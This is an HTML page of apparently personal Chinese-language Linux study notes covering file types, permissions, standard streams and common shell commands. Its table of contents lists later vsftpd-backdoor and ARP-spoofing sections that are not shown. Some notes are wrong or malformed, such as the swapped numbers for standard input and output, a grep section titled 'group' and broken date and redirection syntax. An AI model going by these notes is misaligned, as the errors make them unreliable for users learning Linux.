href="#%E7%94%A8%E6%88%B7%E5%92%8C%E7%BB%84"><span class="toc-text">用户和组</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E6%88%B7"><span class="toc-text">用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%84"><span class="toc-text">组</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E4%B8%8E%E7%BB%88%E6%AD%A2%E8%BF%9B%E7%A8%8B"><span class="toc-text">查看与终止进程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux-%E5%85%B6%E4%BB%96"><span class="toc-text">Linux 其他</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux-%E7%B3%BB%E7%BB%9F%E4%B8%8B%E7%9A%84%E9%80%9A%E9%85%8D%E7%AC%A6-%EF%BC%8820%E4%B8%AA%EF%BC%89"><span class="toc-text">Linux 系统下的通配符 （20个）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux%E7%B3%BB%E7%BB%9F%E4%B8%8B%E7%9A%84%E5%B8%B8%E7%94%A8%E5%BF%AB%E6%8D%B7%E6%93%8D%E4%BD%9C%EF%BC%88%E4%B8%83%E4%B8%AA%EF%BC%89"><span class="toc-text">Linux系统下的常用快捷操作（七个）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux%E7%BD%91%E7%BB%9C"><span class="toc-text">Linux网络</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ifconfig-ip-ping"><span class="toc-text">ifconfig &amp; ip &amp; ping</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E9%9D%99%E6%80%81%E9%85%8D%E7%BD%AE"><span class="toc-text">网络静态配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#route-%E8%B7%AF%E7%94%B1%E9%85%8D%E7%BD%AE"><span class="toc-text">route 路由配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DNS-%E6%A3%80%E6%B5%8B-nslookup-tracert"><span class="toc-text">DNS 检测- nslookup &amp; tracert</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E7%9B%91%E6%8E%A7-netstat-ss"><span class="toc-text">网络监控 - netstat &amp; ss</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8A%93%E5%8C%85tcpdump"><span class="toc-text">抓包tcpdump</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8"><span class="toc-text">使用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8C%85%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7"><span class="toc-text">包管理工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#rpm"><span class="toc-text">rpm</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1vsftpd"><span class="toc-text">服务vsftpd</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E8%A3%85-%E5%8D%B8%E8%BD%BDvsftpd"><span class="toc-text">安装&amp;卸载vsftpd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AEvsftpd"><span class="toc-text">配置vsftpd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8vsftpd"><span class="toc-text">使用vsftpd</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ARP"><span class="toc-text">ARP</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81ARP%E5%91%BD%E4%BB%A4"><span class="toc-text">常见ARP命令</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Centos7"><span class="toc-text">Centos7</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Centos7%E5%AE%89%E8%A3%85-%E9%85%8D%E7%BD%AE"><span class="toc-text">Centos7安装&amp;配置</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7%E5%AE%89%E8%A3%85"><span class="toc-text">Centos7安装</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7%E6%9B%B4%E6%8D%A2%E6%BA%90"><span class="toc-text">Centos7更换源</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7%E5%AE%89%E8%A3%85%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="toc-text">Centos7安装常用工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7%E5%85%B3%E9%97%ADselinux"><span class="toc-text">Centos7关闭selinux</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Centos7%E7%BD%91%E7%BB%9C%E9%85%8D%E7%BD%AE"><span class="toc-text">Centos7网络配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E5%91%BD%E4%BB%A4"><span class="toc-text">其他命令</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Kali"><span class="toc-text">Kali</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Kali%E5%AE%89%E8%A3%85-%E9%85%8D%E7%BD%AE"><span class="toc-text">Kali安装&amp;配置</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Kali%E5%AE%89%E8%A3%85"><span class="toc-text">Kali安装</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E"><span class="toc-text">漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0001-%E7%AC%91%E8%84%B8%E6%BC%8F%E6%B4%9E-21-port-vsftpd-2-3"><span class="toc-text">0001 - 笑脸漏洞 ): (21 port, vsftpd 2.3)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0"><span class="toc-text">复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E6%88%AA%E5%9B%BE%E5%A6%82%E4%B8%8B"><span class="toc-text">相关截图如下</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95"><span class="toc-text">解决方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0002-ARP-%E6%AC%BA%E9%AA%97%E6%94%BB%E5%87%BB%EF%BC%88%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB%EF%BC%89"><span class="toc-text">0002 - ARP 欺骗攻击（中间人攻击）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-1"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0-1"><span class="toc-text">复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E6%88%AA%E5%9B%BE%E5%A6%82%E4%B8%8B-1"><span class="toc-text">相关截图如下</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95-1"><span class="toc-text">解决方法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0003"><span class="toc-text">0003 -</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="Linux基础"><a href="#Linux基础" class="headerlink" title="Linux基础"></a>Linux基础</h1><h2 id="Linux-概念"><a href="#Linux-概念" class="headerlink" title="Linux 概念"></a>Linux 概念</h2><h3 id="Linux-目录结构"><a href="#Linux-目录结构" class="headerlink" title="Linux 目录结构"></a>Linux 目录结构</h3><p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250825171924754.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250825172226876.png" alt="Linux目录结构"></p>
<p>Linux目录结构</p>
<h3 id="Linux标准输入输出"><a href="#Linux标准输入输出" class="headerlink" title="Linux标准输入输出"></a>Linux标准输入输出</h3><pre><code class="hljs bash"><span class="hljs-comment"># 标准输出：0</span>
终端
<span class="hljs-comment"># 标准输入：1</span>
键盘
<span class="hljs-comment"># 标准错误：2</span>
终端
<span class="hljs-comment"># 输出重定向</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;hello word&quot;</span> &gt; aa.txt
</code></pre>



<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250828151659700.png" alt="img"></p>
<h3 id="文件权限"><a href="#文件权限" class="headerlink" title="文件权限"></a>文件权限</h3><pre><code class="hljs bash"><span class="hljs-comment"># 一个文件或目录，有三种角色：文件的所有者u，文件所有者的所属组g，其他用户o，所有用户a</span>

<span class="hljs-comment">## Linux三种权限位</span>
<span class="hljs-built_in">read</span> <span class="hljs-comment"># 文件是cat; 目录是ls</span>
write <span class="hljs-comment"># 文件是touch,vim; 目录是 mkdir,mv,rm</span>
execute <span class="hljs-comment"># 文件是./脚本， 目录是cd 命令</span>
</code></pre>

<h3 id="文件特殊权限"><a href="#文件特殊权限" class="headerlink" title="文件特殊权限"></a>文件特殊权限</h3><pre><code class="hljs bash"><span class="hljs-comment">##文件特殊权限是对一般权限的补充（由于管理员不受一般权限的控制，可以通过特殊权限来控制），特殊权限会对管理员生效。</span>
<span class="hljs-comment"># SUID针对所有者的特殊权限：会让此文件执行者临时获取文件所有者的权限来完成某些工作，rwS</span>
<span class="hljs-comment"># SGID</span>
<span class="hljs-comment"># SBID其他用户的权限，</span>
注：
<span class="hljs-built_in">sudo</span> 是借用root权限
SUID 是借用所有者的权限
SGID 是借用属组的权限
</code></pre>

<h2 id="Linux文件类型"><a href="#Linux文件类型" class="headerlink" title="Linux文件类型"></a>Linux文件类型</h2><pre><code class="hljs bash">以下文件类型均有对应字符表示：
- : 平台文件
d(directory) : 目录文件 
c(character) : 字符设备文件
b(block) : 块设备文件
s(socket) : 套接字文件
p(pipe) : 管道文件
l(<span class="hljs-built_in">link</span>) : 符号链接文件
<span class="hljs-comment"># 普通文件、目录文件、块设备文件、字符设备文件和套接字文件都是实际存在文件系统中的文件，而符号链接文件和命名管道</span>

<span class="hljs-comment"># 文件类型，权限，链接数，文件所有者，文件所属组，文件大小，最后修改时间，名称</span>
<span class="hljs-built_in">command</span> --<span class="hljs-built_in">help</span> <span class="hljs-comment"># 查看命令</span>

<span class="hljs-comment">## ls</span>
<span class="hljs-built_in">ls</span> -alh <span class="hljs-comment"># 大小使用k单位显示</span>
<span class="hljs-built_in">ls</span> -ai <span class="hljs-comment"># 显示index索引</span>

<span class="hljs-comment">## file [选项] 文件名</span>
file anaconda-ks.cfg <span class="hljs-comment"># ASCII text 普通文本文件</span>
file /bin/cd <span class="hljs-comment"># shell script 可运行脚本</span>
file /var/log/wtmp <span class="hljs-comment"># data 数据格式的文件</span>
file /var/log/tuned <span class="hljs-comment"># directory 目录文件</span>
file /
</code></pre>

<h3 id="普通文件类型（Regular-File）"><a href="#普通文件类型（Regular-File）" class="headerlink" title="普通文件类型（Regular File）"></a>普通文件类型（Regular File）</h3><pre><code class="hljs lasso"><span class="hljs-number">1</span>、纯文本文件（ASCII）: 普通文本，可以直接读取；
<span class="hljs-number">2</span>、二进制文件（binary）：可运行脚本
<span class="hljs-number">3</span>、数据格式的文件（<span class="hljs-built_in">data</span>）：cat /<span class="hljs-built_in">var</span>/<span class="hljs-keyword">log</span>/wtmp 读取不了，要使用 who /<span class="hljs-built_in">var</span>/<span class="hljs-keyword">log</span>/wtmp 读取
复制代码</code></pre>

<h3 id="目录文件类型（Directory-File）"><a href="#目录文件类型（Directory-File）" class="headerlink" title="目录文件类型（Directory File）"></a>目录文件类型（Directory File）</h3><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> 命令可以进入的，蓝色
复制代码</code></pre>

<h3 id="设备文件类型（Device-File）"><a href="#设备文件类型（Device-File）" class="headerlink" title="设备文件类型（Device File）"></a>设备文件类型（Device File）</h3><pre><code class="hljs gradle"><span class="hljs-number">1</span>、块设备文件（Block Device <span class="hljs-keyword">File</span>）：硬盘、USB；IDE（<span class="hljs-regexp">/dev/</span>hd**）,SCSI<span class="hljs-regexp">/SATA/U</span>SB（<span class="hljs-regexp">/dev/</span>sd**）
<span class="hljs-number">2</span>、字符设备文件（Character Device <span class="hljs-keyword">File</span>）：键盘，鼠标，打印机
复制代码</code></pre>

<h3 id="套接字文件（Socket）"><a href="#套接字文件（Socket）" class="headerlink" title="套接字文件（Socket）"></a>套接字文件（Socket）</h3><pre><code class="hljs">套接字文件是一种特殊的文件，用于进程间的通信，提供一种全双工的通信方式。网络通信方式，网络数据连接。
复制代码</code></pre>

<h3 id="管道文件（FIFO）"><a href="#管道文件（FIFO）" class="headerlink" title="管道文件（FIFO）"></a>管道文件（FIFO）</h3><pre><code class="hljs bash">管道文件，也称为命名管道，用于实现进程间的通信；提供半双工的通信方式，在Shell脚本和进程通信场景中使用。
</code></pre>

<h3 id="链接文件（Symbolic-link）"><a href="#链接文件（Symbolic-link）" class="headerlink" title="链接文件（Symbolic link）"></a>链接文件（Symbolic link）</h3><pre><code class="hljs bash">软链接：例如 /bin -&gt; usr/bin
硬链接：usr/bin
复制代码</code></pre>

<h3 id="特殊文件（Special-file）"><a href="#特殊文件（Special-file）" class="headerlink" title="特殊文件（Special file）"></a>特殊文件（Special file）</h3><pre><code class="hljs 1c"><span class="hljs-string">&quot;/dev/null&quot;</span>文件：用于丢失数据
<span class="hljs-string">&quot;/dev/zero&quot;</span>文件：用于产生全零数据
<span class="hljs-string">&quot;/dev/random&quot;</span> 和 <span class="hljs-string">&quot;/dev/urandom&quot;</span>文件：用于产生随机数等
复制代码</code></pre>

<h2 id="Linux-命令"><a href="#Linux-命令" class="headerlink" title="Linux 命令"></a>Linux 命令</h2><h3 id="文件"><a href="#文件" class="headerlink" title="文件"></a>文件</h3><pre><code class="hljs bash"><span class="hljs-comment"># 1、创建文件</span>
<span class="hljs-built_in">touch</span> aa.txt <span class="hljs-comment"># 创建aa.txt文件</span>
<span class="hljs-built_in">echo</span> <span class="hljs-built_in">whoami</span> &gt; aa.txt <span class="hljs-comment">## 输入whoami文本到aa.txt文件中</span>
<span class="hljs-comment"># 2、显示文件内容（6个）：cat/more/less/head/tail</span>
<span class="hljs-comment"># 3、搜索、排序、去重（3个）：grep, sort, uniq</span>
<span class="hljs-comment"># 4、比较（2个）comm, diff</span>
<span class="hljs-comment"># 5、复制、删除、移动（3个）：cp/rm/mv</span>
<span class="hljs-comment"># 6、统计: wc</span>
<span class="hljs-comment"># 7、查找: find</span>
<span class="hljs-comment"># 8、打包、压缩、解压缩（3个）： bzip2/gzip/tar</span>
</code></pre>

<h3 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h3><pre><code class="hljs bash"><span class="hljs-built_in">mkdir</span> <span class="hljs-built_in">test</span> <span class="hljs-comment"># 创建test目录</span>
<span class="hljs-built_in">mkdir</span> -p a/b/c <span class="hljs-comment"># 递归创建a,b,c层级目录</span>

<span class="hljs-built_in">rm</span> -r <span class="hljs-built_in">test</span> <span class="hljs-comment"># 删除test目录</span>
<span class="hljs-built_in">rm</span> -rf a/b/c <span class="hljs-comment"># 递归删除a,b,c层级目录</span>
</code></pre>

<h3 id="文件-目录"><a href="#文件-目录" class="headerlink" title="文件&amp;目录"></a>文件&amp;目录</h3><pre><code class="hljs bash"><span class="hljs-built_in">mv</span> a <span class="hljs-built_in">test</span> <span class="hljs-comment"># 将 a 目录移动到 test下</span>
<span class="hljs-built_in">mv</span> a b <span class="hljs-comment"># 将a目录重命名为b目录</span>

<span class="hljs-built_in">cp</span> aa.txt <span class="hljs-built_in">test</span> <span class="hljs-comment"># 将aa.txt拷贝到test目录下</span>
<span class="hljs-built_in">cp</span> aa.txt <span class="hljs-built_in">test</span>\bb.txt <span class="hljs-comment"># # 将aa.txt拷贝到test下并重命名为bb</span>
<span class="hljs-built_in">cp</span> -r a <span class="hljs-built_in">test</span> <span class="hljs-comment"># 将a 目录复制到test目录下</span>
</code></pre>

<h3 id="echo命令"><a href="#echo命令" class="headerlink" title="echo命令"></a>echo命令</h3><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-built_in">whoami</span> &gt; aa.txt
<span class="hljs-built_in">echo</span> <span class="hljs-built_in">whoami</span> &gt;&gt; aa.txt

<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;\a&quot;</span> <span class="hljs-comment"># -e后面扩展字符</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;123\b123&quot;</span> <span class="hljs-comment"># \b删除前面一个字符</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;123\n123&quot;</span> <span class="hljs-comment"># \n 换行</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;123\r123&quot;</span> <span class="hljs-comment"># \r 回车</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;123\t123&quot;</span> <span class="hljs-comment"># \t 制表符</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;\x61\t\x62\t\x63\t\x64\t\x65\t\x66&quot;</span> <span class="hljs-comment"># 16进制</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;\e[1;33m whoami \e[0m&quot;</span> <span class="hljs-comment"># [1;33m 颜色</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;\e[;31m \e[1:42m whoami \e[0m \e[0m&quot;</span> <span class="hljs-comment"># 括号</span>

<span class="hljs-built_in">echo</span> %(<span class="hljs-built_in">date</span> + <span class="hljs-string">&quot;%Y-%m-%d %H:%M:%S&quot;</span>) <span class="hljs-comment"># 时间</span>
</code></pre>

<h3 id="cat-命令"><a href="#cat-命令" class="headerlink" title="cat 命令"></a>cat 命令</h3><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> aa.txt <span class="hljs-comment"># 查看文件内容</span>
<span class="hljs-built_in">cat</span> &gt; aa.txt <span class="hljs-comment"># 覆盖输入，按Ctrl + D结束</span>
<span class="hljs-built_in">cat</span> &gt;&gt; aa.txt <span class="hljs-comment"># 追加输入，按Ctrl + D结束</span>
<span class="hljs-built_in">cat</span> aa.txt bb.txt cc.txt &gt; dd.txt <span class="hljs-comment"># 将3个文件的内容写到dd.txt中</span>
</code></pre>

<h3 id="more-命令"><a href="#more-命令" class="headerlink" title="more 命令"></a>more 命令</h3><pre><code class="hljs bash">more <span class="hljs-comment"># 空格(或者d)向下翻页，b向上翻页，回车下一行，=显示当前行号</span>
more -6 aa.txt <span class="hljs-comment"># 指定每一页显示6行 </span>
more +6 aa.txt <span class="hljs-comment"># 从第6行开始显示</span>
</code></pre>

<h3 id="less-命令"><a href="#less-命令" class="headerlink" title="less 命令"></a>less 命令</h3><pre><code class="hljs bash"><span class="hljs-comment"># 可以使用上下箭头来控制浏览内容</span>
/a <span class="hljs-comment"># / 向下搜索内容a</span>
?a <span class="hljs-comment"># ? 向上搜索内容a</span>
less -i <span class="hljs-comment"># 忽略大小写</span>
less -N aa.txt <span class="hljs-comment"># 显示行号，可以通过:跳转</span>
</code></pre>

<h3 id="group-命令（三剑客之一）"><a href="#group-命令（三剑客之一）" class="headerlink" title="group 命令（三剑客之一）"></a>group 命令（三剑客之一）</h3><pre><code class="hljs bash">ps -ef | grep python <span class="hljs-comment"># 搜索单词grep</span>
ps -ef | grep python -c <span class="hljs-comment"># 查看单词grep的个数</span>
ifconfig | grep ens33 <span class="hljs-comment"># 查找到ens33网卡行</span>
<span class="hljs-comment"># 常见用法</span>
<span class="hljs-built_in">cat</span> aa.txt | grep user <span class="hljs-comment"># 查询带user的行</span>
<span class="hljs-built_in">cat</span> aa.txt | grep -i user <span class="hljs-comment"># 不区分大小写</span>
<span class="hljs-built_in">cat</span> aa.txt | grep -v <span class="hljs-string">&quot;%&quot;</span> <span class="hljs-comment">#查看 aa.txt 文件中，不包含%的行</span>
<span class="hljs-built_in">cat</span> aa.txt | grep ^<span class="hljs-string">&quot;#&quot;</span> <span class="hljs-comment"># 查看 # 号开头的行</span>
<span class="hljs-built_in">cat</span> aa.txt | grep ^[^1] <span class="hljs-comment"># 输出不是1开头的内容</span>
<span class="hljs-built_in">cat</span> aa.txt | grep y$ <span class="hljs-comment"># 查看y结尾的内容</span>
<span class="hljs-built_in">cat</span> aa.txt | grep ^$ <span class="hljs-comment"># 查看空行</span>
<span class="hljs-built_in">cat</span> aa.txt | grep ^[^$] <span class="hljs-comment"># 不要显示空行</span>
<span class="hljs-comment"># 扩展</span>
<span class="hljs-built_in">cat</span> aa.txt | grep -E <span class="hljs-string">&quot;a|b|c&quot;</span> <span class="hljs-comment"># 输出包含a,b,c开头的行</span>
<span class="hljs-built_in">cat</span> aa.txt | grep - 
</code></pre>



<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250825192252242.png" alt="img"></p>
<h3 id="wc-命令"><a href="#wc-命令" class="headerlink" title="wc 命令"></a>wc 命令</h3><pre><code class="hljs bash"><span class="hljs-comment"># 统计文件的字节数、字数、行数。</span>
<span class="hljs-comment"># wc [选项] [文件]</span>
<span class="hljs-built_in">wc</span> aa.txt
行数	单词数	字节数	文件名
-c <span class="hljs-comment"># 统计字节数</span>
-m <span class="hljs-comment"># 统计字符数</span>
-l <span class="hljs-comment"># 统计行数</span>
-w <span class="hljs-comment"># 统计字数</span>
</code></pre>

<h3 id="find-命令（重要）"><a href="#find-命令（重要）" class="headerlink" title="find 命令（重要）"></a>find 命令（重要）</h3><pre><code class="hljs bash">find / -iname <span class="hljs-built_in">test</span> <span class="hljs-comment"># 不区分大小写</span>
find / -<span class="hljs-built_in">type</span> d -iname <span class="hljs-built_in">test</span> <span class="hljs-comment"># 目录类型，不区分大小写 </span>
find / -<span class="hljs-built_in">type</span> f -perm 777 <span class="hljs-comment"># 查找777权限的文件</span>
find / -<span class="hljs-built_in">type</span> l ! -perm 777 <span class="hljs-comment"># 查找不是777权限的连接文件</span>
find / -<span class="hljs-built_in">type</span> f -empty <span class="hljs-comment"># 查找所有空文件</span>
find / -user tss -name <span class="hljs-string">&quot;*&quot;</span> <span class="hljs-comment"># 查找用户tss的所有文件</span>
find / -user tss 2 &gt; null <span class="hljs-comment"># 将报错（返回2）的不要显示</span>
</code></pre>



<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250825192802954.png" alt="img"></p>
<h3 id="bzip2-gzip-打包-压缩（重要）"><a href="#bzip2-gzip-打包-压缩（重要）" class="headerlink" title="bzip2 | gzip 打包 &amp; 压缩（重要）"></a>bzip2 | gzip 打包 &amp; 压缩（重要）</h3><pre><code class="hljs bash"><span class="hljs-comment"># bzip2 -&gt; .bz2文件，v 是过程可视化，f 是强制解压（默认不保留源文件）</span>
bzip2 aa.txt <span class="hljs-comment"># 压缩生成aa.txt.bz2，不保留原文件</span>
bzip2 -k aa.txt <span class="hljs-comment"># 生成aa.txt.bz2，保留原文件</span>
bzip2 -d aa.txt.bz2 <span class="hljs-comment"># 解压，压缩包不保留</span>
bzip2 -t aa.txt.bz2 <span class="hljs-comment"># 检测压缩包是否有问题</span>

<span class="hljs-comment"># gzip -&gt; .gz文件，v 是过程可视化，f 是强制解压（默认不保留源文件）</span>
gzip aa.txt bb.txt <span class="hljs-comment"># 分别压缩，生成2个压缩文件 aa.txt.gz, bb.txt.gz</span>
gzip -l aa.txt.gz <span class="hljs-comment"># 列出压缩文件的内容信息</span>
gzip -d aa.txt.gz <span class="hljs-comment"># 解压</span>
gzip -r <span class="hljs-built_in">test</span> <span class="hljs-comment"># 递归压缩test目录下的aa.txt，bb.txt，cc.txt</span>
gzip -rd <span class="hljs-built_in">test</span> <span class="hljs-comment"># 递归解压test目录下的压缩文件</span>

<span class="hljs-comment">## tar -&gt; .tar文件，f是一定要有的，c是创建，x是解压缩，v是可视化，t是查看压缩内容（默认保留源文件）</span>
<span class="hljs-comment"># z: gz格式</span>
<span class="hljs-comment"># j: bz2格式</span>
tar -cvf aa.txt.tar aa.txt
tar -xvf aa.txt.tar
tar -czvf aa.txt.gz aa.txt
tar -xzvf aa.txt.gz
tar -cjvf aa.txt.bz2 aa.txt
tar -xjvf aa.txt.bz2
</code></pre>

<h3 id="uname-命令"><a href="#uname-命令" class="headerlink" title="uname 命令"></a>uname 命令</h3><pre><code class="hljs bash"><span class="hljs-built_in">uname</span> <span class="hljs-comment"># 显示linux</span>
<span class="hljs-built_in">uname</span> -a <span class="hljs-comment"># 查询系统所有的信息</span>
<span class="hljs-built_in">uname</span> -r <span class="hljs-comment"># 发行编号</span>
<span class="hljs-built_in">uname</span> -v <span class="hljs-comment"># 查看版本号</span>
<span class="hljs-built_in">uname</span> - io <span class="hljs-comment"># 操作系统名称</span>
</code></pre>

<h3 id="service-命令"><a href="#service-命令" class="headerlink" title="service 命令"></a>service 命令</h3><pre><code class="hljs bash">service [服务名] [start | stop | restart | reload | status]
<span class="hljs-comment"># 在 Centos7.0 后，很多服务不在使用 `service`，而是是 `systemctl`</span>
</code></pre>

<h3 id="systemctl-命令"><a href="#systemctl-命令" class="headerlink" title="systemctl 命令"></a>systemctl 命令</h3><pre><code class="hljs bash">systemctl [optinons] <span class="hljs-built_in">command</span> [unit]
<span class="hljs-comment"># options: -H, --host（指定systemd实例的主机名或者IP）</span>
[start, stop, restart, reload, <span class="hljs-built_in">enable</span>, <span class="hljs-built_in">disable</span>, status, is-active, is-enable, mask, unmask等]
systemctl show ServiceName <span class="hljs-comment"># 查看服务的内容</span>
systemctl mask ServiceName <span class="hljs-comment"># 注销，不可以start，需要unmask</span>
systemctl unmask ServiceName <span class="hljs-comment"># 取消注销</span>
</code></pre>

<h3 id="cut-命令"><a href="#cut-命令" class="headerlink" title="cut 命令"></a>cut 命令</h3><pre><code class="hljs bash"><span class="hljs-built_in">cut</span> [选项参数] [filename]
<span class="hljs-comment"># cut 命令，剪</span>
<span class="hljs-comment"># 文件aa.txt文件如下, 分隔符可以是空格，逗号等</span>
1	2	3
4	5	6
<span class="hljs-comment"># cut -d &#x27;	&#x27; -f 1 aa.txt</span>
1
4
<span class="hljs-comment"># cut -d &#x27;	&#x27; -f 1-2 aa.txt</span>
1	2
4	5
<span class="hljs-built_in">cut</span> -d : -f 1,3 /etc/passwd <span class="hljs-comment"># 只显示第1,3列</span>
</code></pre>

<h3 id="Linux-痕迹命令"><a href="#Linux-痕迹命令" class="headerlink" title="Linux 痕迹命令"></a>Linux 痕迹命令</h3><pre><code class="hljs bash">w <span class="hljs-comment"># 显示系统当前登录的用户信息，who命令信息文件（/var/run/utmp）</span>
<span class="hljs-built_in">who</span> <span class="hljs-comment"># 显示系统中正在使用的用户，包含ID，tty,IP，登录时间</span>
last <span class="hljs-comment"># 查看用户近期登录信息</span>
<span class="hljs-built_in">tty</span> <span class="hljs-comment"># 查看当前登录的tty</span>
lastlog <span class="hljs-comment"># 账号最后登录时间</span>
lastb <span class="hljs-comment"># 登录错误记录</span>
<span class="hljs-built_in">logname</span> <span class="hljs-comment"># 查看原始登录的用户（切换用户的情况）</span>
</code></pre>

<h3 id="多命令执行方式"><a href="#多命令执行方式" class="headerlink" title="多命令执行方式"></a>多命令执行方式</h3><pre><code class="hljs bash"><span class="hljs-comment"># ; &amp;&amp; || 之间混合使用</span>
command1; command2; command3 <span class="hljs-comment"># 顺序执行，命令中有错误也会执行后面</span>
command1 &amp;&amp; command2 &amp;&amp; command3 <span class="hljs-comment"># 顺序执行，有错误后面不执行</span>
command1 || command2 || command3 <span class="hljs-comment"># 命令1错误执行命令2，命令2错误执行命令3，命令1正确后面不执行</span>
command1 | command2 | command3 <span class="hljs-comment"># 除了管道过滤作用 或 ，只显示最后一个命令的结果</span>
</code></pre>

<h3 id="vim-文件编辑"><a href="#vim-文件编辑" class="headerlink" title="vim 文件编辑"></a>vim 文件编辑</h3><pre><code class="hljs bash"><span class="hljs-comment"># 命令模式</span>
<span class="hljs-built_in">dd</span> <span class="hljs-comment"># 删除（剪切）</span>
yy <span class="hljs-comment"># 复制</span>
p <span class="hljs-comment"># 粘贴</span>
u <span class="hljs-comment"># 撤销</span>
ctrl + r <span class="hljs-comment"># 恢复撤销</span>
<span class="hljs-comment"># 末行模式</span>
/^字符串 <span class="hljs-comment"># 向下查询字符串开头</span>
?字符串&amp; <span class="hljs-comment"># 向上查询字符结尾，可以结合正则表达式</span>
:<span class="hljs-built_in">set</span> nu <span class="hljs-comment"># 显示行号</span>
:<span class="hljs-built_in">set</span> nonu <span class="hljs-comment"># 取消行号</span>
</code></pre>

<h2 id="用户和组"><a href="#用户和组" class="headerlink" title="用户和组"></a>用户和组</h2><pre><code class="hljs routeros">用户,<span class="hljs-attribute">UID</span>=1000-60000
超级用户: root, <span class="hljs-attribute">ID</span>=0
虚拟用户：1-999之间
复制代码</code></pre>

